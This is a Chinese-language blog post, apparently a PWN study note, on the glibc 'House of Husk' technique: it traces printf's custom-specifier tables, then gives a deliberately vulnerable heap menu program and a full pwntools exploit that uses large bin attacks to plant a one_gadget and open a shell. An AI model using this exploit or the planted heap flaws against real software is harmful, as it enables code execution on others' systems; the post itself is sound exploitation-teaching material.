当前位置：首页 > news >正文

【我的 PWN 学习手札】House of Husk

news 2025/11/21 10:04:49

House of Husk

House of Husk 利用的是：printf、vprintf 等格式化输出函数在打印输出时，会解析 %x、%lld 等格式化字符，从而调用不同的格式化打印方法（函数）。同时 glibc 还提供了注册自定义格式化字符的方法，而这种注册实际上是通过两张保存在全局的表实现的。为此我们以伪装/篡改这两张表为核心目标，劫持函数指针，从而控制程序流。

一、printf调用过程

printf是通过ldbl_strong_alias创建的__printf的别名，__printf又调用了vfprintf

因此printf➡__printf➡vfprintf

// stdio-common/printf.c
/* Write formatted output to stdout according to FORMAT.
   Forwards the variadic arguments to vfprintf on stdout and returns
   whatever vfprintf returns.  */
int
__printf (const char *format, ...)
{
  va_list arg;
  int done;

  va_start (arg, format);
  done = vfprintf (stdout, format, arg);
  va_end (arg);

  return done;
}

#undef _IO_printf
/* printf is exported as an alias of __printf.  */
ldbl_strong_alias (__printf, printf);

vfprintf中预设了进行自定义格式化字符串处理的分支do_positional，其中继续调用printf_positional函数

因此vfprintf➡do_positional➡printf_positional

/* The function itself.  */
int vfprintf(FILE *s, const CHAR_T *format, va_list ap)
{.../* Use the slow path in case any printf handler is registered.  */if (__glibc_unlikely(__printf_function_table != NULL || __printf_modifier_table != NULL ||__printf_va_arg_table != NULL)) // 当三个表之一不为空时，即说明有自定义的格式化字符串处理方法goto do_positional;/* Process whole format string.  */ //执行默认的格式化打印规则do{...} while (*f != L_('\0'));/* Unlock stream and return.  */goto all_done;/* Hand off processing for positional parameters.  */
do_positional:if (__glibc_unlikely(workstart != NULL)){free(workstart);workstart = NULL;}done = printf_positional(s, format, readonly_format, ap, &ap_save,done, nspecs_done, lead_str_end, work_buffer,save_errno, grouping, thousands_sep);
all_done:...return done;
}

printf_positional函数中，检查自定义的格式化操作表，选择自定义格式化字符对应的函数指针，传入参数，完成自定义格式化操作。

因此printf_positional➡__printf_function_table[(size_t)spec](s, &specs[nspecs_done].info, ptr);

/* Abridged excerpt (`...` marks elided code).  Called from the
   do_positional branch of vfprintf: first parses every format specifier
   with __parse_one_specmb, then walks the parsed specifiers and, when a
   handler is present in __printf_function_table for the specifier
   character, calls that handler.  */
static int
printf_positional(_IO_FILE *s, const CHAR_T *format, int readonly_format,
                  va_list ap, va_list *ap_savep, int done, int nspecs_done,
                  const UCHAR_T *lead_str_end,
                  CHAR_T *work_buffer, int save_errno,
                  const char *grouping, THOUSANDS_SEP_T thousands_sep)
{
    ...
    for (const UCHAR_T *f = lead_str_end; *f != L_('\0');
         f = specs[nspecs++].next_fmt)
    {
        ...
        /* Parse the format specifier.  */
        nargs += __parse_one_specmb(f, nargs, &specs[nspecs], &max_ref_arg);
    }
    ...
    /* Now walk through all format specifiers and process them.  */
    for (; (size_t)nspecs_done < nspecs; ++nspecs_done)
    {
        ...
        /* Fill variables from values in struct.  */
        ...
        /* Fill in last information.  */
        ...
        /* Maybe the buffer is too small.  */
        ...
        /* Process format specifiers.  */
        while (1)
        {
            extern printf_function **__printf_function_table;
            int function_done;

            /* A registered handler exists for this specifier character.  */
            if (spec <= UCHAR_MAX && __printf_function_table != NULL && __printf_function_table[(size_t)spec] != NULL)
            {
                const void **ptr = alloca(specs[nspecs_done].ndata_args * sizeof(const void *));

                /* Fill in an array of pointers to the argument values.  */
                for (unsigned int i = 0; i < specs[nspecs_done].ndata_args;
                     ++i)
                    ptr[i] = &args_value[specs[nspecs_done].data_arg + i];

                /* Call the function.  */
                /* This indirect call is the function pointer the
                   technique hijacks.  */
                function_done = __printf_function_table[(size_t)spec](s, &specs[nspecs_done].info, ptr);
                ...
            }
        }
        ...
    }
all_done:
    ...
}

另外，printf_positional➡__parse_one_specmb()➡(*__printf_arginfo_table[spec->info.spec])(&spec->info, 1, &spec->data_arg_type,&spec->size)

/* Abridged excerpt (`...` marks elided code).  While parsing one format
   specifier, the condition below calls the entry of
   __printf_arginfo_table for the specifier character whenever
   __printf_function_table is non-NULL, the character is <= UCHAR_MAX and
   that entry is non-NULL.  Note that __printf_arginfo_table itself is
   indexed without a NULL check of its own.  */
size_t
attribute_hidden
__parse_one_specmb (const UCHAR_T *format, size_t posn,
                    struct printf_spec *spec, size_t *max_ref_arg)
{
  ...
  if (__builtin_expect (__printf_function_table == NULL, 1)
      || spec->info.spec > UCHAR_MAX
      || __printf_arginfo_table[spec->info.spec] == NULL
      /* We don't try to get the types for all arguments if the format
         uses more than one.  The normal case is covered though.  If
         the call returns -1 we continue with the normal specifiers.  */
      || (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec])
                                   (&spec->info, 1, &spec->data_arg_type,
                                    &spec->size)) < 0)
    {
      ...
    }
  ...
}

因此不论是__printf_arginfo_table还是__printf_function_table的注册函数都会被调用，这两个地方都可以用作劫持。然而有几点需要注意

1. __printf_arginfo_table中的函数指针先被调用，__printf_function_table中的函数指针后被调用
2. 一般通过vfprintf中的__printf_function_table != NULL触发自定义格式化字符解析的分支
3. 由于"1"和"2"，如果借助__printf_arginfo_table劫持程序流，一般也需要确保__printf_function_table != NULL
4. 由于"1"和"2"，如果借助__printf_function_table劫持程序流，需要确保__printf_arginfo_table != NULL，否则__parse_one_specmb在访问__printf_arginfo_table[spec->info.spec]时会出错；同时还需要__printf_arginfo_table[spec->info.spec] == NULL，避免先调用到一个无效的arginfo函数指针

二、格式化字符处理函数注册机制

既然存在"自定义字符-自定义格式化函数"的映射处理机制，我们不妨看一下注册函数，以便更好地理解这几张表的作用。

通过在源码项目中查找"__printf_function_table"字符串，可以定位到"stdio-common/reg-printf.c"中的__register_printf_specifier函数

/* Register FUNC to be called to format SPEC specifiers.  */
int __register_printf_specifier(int spec, printf_function converter,printf_arginfo_size_function arginfo)
{if (spec < 0 || spec > (int)UCHAR_MAX){__set_errno(EINVAL);return -1;}int result = 0;__libc_lock_lock(lock);if (__printf_function_table == NULL) // 如果为空，说明是第一次注册，开始建表{__printf_arginfo_table = (printf_arginfo_size_function **)// /* Maximum value an `unsigned char' can hold.  (Minimum is 0.)  */// #  define UCHAR_MAX	255calloc(UCHAR_MAX + 1, sizeof(void *) * 2); 	//创建表，分配一段大小为(UCHAR_MAX + 1) * sizeof(void *) * 2的连续空间//可以存储0x200个(void*)类型数据if (__printf_arginfo_table == NULL){result = -1;goto out;}// __printf_arginfo_table 占分配空间前0x100个(void*)的空间// __printf_function_table占分配空间后0x100个(void*)的空间// |__printf_arginfo_table | __printf_function_table|// |<--------0x100-------->|<---------0x100-------->| 每个单元大小：sizeof(void*)__printf_function_table = (printf_function **)(__printf_arginfo_table + UCHAR_MAX + 1);}//自定义格式化字符spec与两张表的映射关系即索引关系__printf_function_table[spec] = converter;__printf_arginfo_table[spec] = arginfo;out:__libc_lock_unlock(lock);return result;
}
libc_hidden_def(__register_printf_specifier)weak_alias(__register_printf_specifier, register_printf_specifier);/* Register FUNC to be called to format SPEC specifiers.  */
int
__register_printf_function (int spec, printf_function converter,  // 封装__register_printf_specifierprintf_arginfo_function arginfo)
{return __register_printf_specifier (spec, converter,(printf_arginfo_size_function*) arginfo);
}
weak_alias (__register_printf_function, register_printf_function)

三、模板题与题解

pwn.c

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

/*
 * Menu-driven heap playground used as the exploitation target.
 *
 * NOTE: the missing index bounds checks, the pointer left in chunk_list
 * after free(), and the caller-controlled length in edit_chunk() appear to
 * be intentional -- they are the primitives the accompanying exploit uses.
 * Do not "fix" them.
 */

/* Pointers handed out by add_chunk(), addressed by a user-supplied index. */
char *chunk_list[0x100];

/* Print the menu and the "choice:" prompt. */
void menu(void)
{
    puts("1. add chunk");
    puts("2. delete chunk");
    puts("3. edit chunk");
    puts("4. show chunk");
    puts("5. exit");
    puts("choice:");
}

/*
 * Read one decimal number from stdin.
 *
 * read() does not NUL-terminate, so one byte is reserved and the terminator
 * is written explicitly; otherwise atoi() would keep parsing whatever stale
 * bytes happen to follow the input on the stack.  A failed read yields an
 * empty string, for which atoi() returns 0.
 */
int get_num(void)
{
    char buf[0x10];
    ssize_t n = read(0, buf, sizeof(buf) - 1);

    if (n < 0) {
        n = 0;
    }
    buf[n] = '\0';
    return atoi(buf);
}

/* Ask for an index and a size, then store malloc(size) at that index. */
void add_chunk(void)
{
    puts("index:");
    int index = get_num();
    puts("size:");
    int size = get_num();
    chunk_list[index] = malloc(size);
}

/* Ask for an index and free that chunk; the slot is not cleared. */
void delete_chunk(void)
{
    puts("index:");
    int index = get_num();
    free(chunk_list[index]);
}

/* Ask for an index and a length, then read that many bytes into the chunk. */
void edit_chunk(void)
{
    puts("index:");
    int index = get_num();
    puts("length:");
    int length = get_num();
    puts("content:");
    read(0, chunk_list[index], length);
}

/* Ask for an index and print the chunk as a C string. */
void show_chunk(void)
{
    puts("index:");
    int index = get_num();
    puts(chunk_list[index]);
}

/* Disable stdio buffering, then serve menu choices until "5" (exit). */
int main(void)
{
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    while (1) {
        menu();
        int choice = get_num();
        switch (choice) {
        case 1:
            add_chunk();
            break;
        case 2:
            delete_chunk();
            break;
        case 3:
            edit_chunk();
            break;
        case 4:
            show_chunk();
            break;
        case 5:
            exit(0);
        default:
            /* The only printf with a conversion specifier (%d) in the program. */
            printf("invalid choice %d.\n", choice);
        }
    }
}

exp.py

from pwn import *

elf = ELF("./pwn")
libc = ELF("./libc.so.6")
context.arch = elf.arch
context.log_level = 'debug'
context.os = elf.os


def add(index, size):
    """Menu option 1: allocate a chunk of `size` bytes at slot `index`."""
    io.sendafter(b"choice:", b"1")
    io.sendafter(b"index:", str(index).encode())
    io.sendafter(b"size:", str(size).encode())


def delete(index):
    """Menu option 2: free the chunk stored at slot `index`."""
    io.sendafter(b"choice:", b"2")
    io.sendafter(b"index:", str(index).encode())


def edit(index, content):
    """Menu option 3: write `content` (bytes) into the chunk at slot `index`."""
    io.sendafter(b"choice:", b"3")
    io.sendafter(b"index:", str(index).encode())
    io.sendafter(b"length:", str(len(content)).encode())
    io.sendafter(b"content:", content)


def show(index):
    """Menu option 4: make the target print the chunk at slot `index`."""
    io.sendafter(b"choice:", b"4")
    io.sendafter(b"index:", str(index).encode())


io = process("./pwn")

add(0, 0x418)
add(1, 0x18)
add(2, 0x428)
add(3, 0x18)
delete(2)
add(10, 0x500)

# Leak libc base: the first 6 bytes printed for the freed chunk 2 are a
# libc pointer at a fixed offset (0x1d20b0) from the base.
show(2)
io.recvline()
libc.address = u64(io.recv(6).ljust(8, b'\x00')) - 0x1d20b0
success("libc base: " + hex(libc.address))

# Leak heap base: overwrite the first 0x10 bytes so the print runs on into
# the heap pointer stored right after them, then mask to a page boundary.
edit(2, b'a' * 8 * 2)
show(2)
io.recvline()
io.recvuntil(b'a' * 0x10)
heap_base = u64(io.recv(6).ljust(8, b'\x00')) & ~0xfff
success("heap base: " + hex(heap_base))
# Put back the pointers clobbered by the 'a' padding.
edit(2, p64(libc.address + 0x1d20b0) * 2 + p64(heap_base + 0x6d0))

# Locate the two global tables by their offsets from the libc base.
__printf_function_table = libc.address + 0x1d3980
__printf_arginfo_table = libc.address + 0x1d2890

# Large bin attack: make __printf_function_table point at a piece of heap
# memory; later that memory is written so that the slot of the specifier
# that will be called holds the one_gadget address.
edit(2, p64(0) * 3 + p64(__printf_function_table - 0x20))
delete(0)
add(0, 0x100)

# one_gadget candidates:
# 0xd3361 execve("/bin/sh", r13, r12)
# constraints:
#   [r13] == NULL || r13 == NULL || r13 is a valid argv
#   [r12] == NULL || r12 == NULL || r12 is a valid envp
# 0xd3364 execve("/bin/sh", r13, rdx)
# constraints:
#   [r13] == NULL || r13 == NULL || r13 is a valid argv
#   [rdx] == NULL || rdx == NULL || rdx is a valid envp
# 0xd3367 execve("/bin/sh", rsi, rdx)
# constraints:
#   [rsi] == NULL || rsi == NULL || rsi is a valid argv
#   [rdx] == NULL || rdx == NULL || rdx is a valid envp
one_gadgets = [i + libc.address for i in [0xd3361, 0xd3364, 0xd3367]]

# Repair chunk 2's list pointers, then take the chunk back out.
edit(2, p64(libc.address + 0x1d20b0) * 2 + p64(heap_base + 0x6d0) * 2)
add(2, 0x428)

#########################################################
# Writing only __printf_function_table while __printf_arginfo_table is
# still NULL crashes in the `if` condition of __parse_one_specmb.
# So a second large bin attack points __printf_arginfo_table at a heap
# region; since nothing has been written to that region it is easy to
# satisfy __printf_arginfo_table[spec] == NULL.
add(10, 0x300)
add(10, 0x418)
add(11, 0x18)
add(12, 0x428)
add(13, 0x18)
delete(12)
add(20, 0x500)
edit(12, p64(0) * 3 + p64(__printf_arginfo_table - 0x20))
delete(10)
add(10, 0x100)
#########################################################

# Place the one_gadget in the 'd' slot of the fake function table.
# NOTE(review): the "- 2" presumably accounts for the 0x10-byte chunk header
# in front of the user data -- confirm in a debugger.
edit(2, (ord('d') - 2) * p64(0) + p64(one_gadgets[0]))

# A non-numeric choice makes the target reach its
# printf("invalid choice %d.\n", ...) call, which dispatches on %d.
io.sendlineafter(b"choice:", b"~!@")
io.interactive()

在这里插入图片描述

【我的 PWN 学习手札】House of Husk

House of Husk

一、printf调用过程

二、格式化字符处理函数注册机制

三、模板题与题解

相关文章：

【我的 PWN 学习手札】House of Husk

(八)趣学设计模式之装饰器模式！

设计后端返回给前端的返回体

Element Plus中el-select选择器的下拉选项列表的样式设置

C高级（shell)

子宫腺肌症是如果引起的？

网络安全学习中，web渗透的测试流程是怎样的？

【软考】【2025年系统分析师拿证之路】【啃书】第十四章软件实现与测试（十五）

自然语言处理NLP深探

加载互联网免费地图资源并通过CesiumEarth快速浏览

Android 键盘输入按确认或换行直接触发提交

halcon三维点云数据处理（二十七）remove_bin_for_3d_object_localization

XFeat：轻量级的深度学习图像特征匹配

[MD] AG stable

微信小程序自定义导航栏实现指南

wav格式的音频压缩，WAV 转 MP3 VBR 体积缩减比为 13.5%、多个 MP3 格式音频合并为一个、文件夹存在则删除重建，不存在则直接建立

面试问题——如何解决移动端1px 边框问题？

鸿蒙开发第4篇__关于在鸿蒙应用中使用Java语言进行设计

什么是Ollama？什么是GGUF？二者之间有什么关系？

kubernetes 初学命令

Java 语言特性(面试系列2)

云原生核心技术 (7/12): K8s 核心概念白话解读(上)：Pod 和 Deployment 究竟是什么？

day52 ResNet18 CBAM

Java 8 Stream API 入门到实践详解

UE5 学习系列（三）创建和移动物体

大语言模型如何处理长文本？常用文本分割技术详解

STM32标准库-DMA直接存储器存取

新能源汽车智慧充电桩管理方案：新能源充电桩散热问题及消防安全监管方案

3403. 从盒子中找出字典序最大的字符串 I

select、poll、epoll 与 Reactor 模式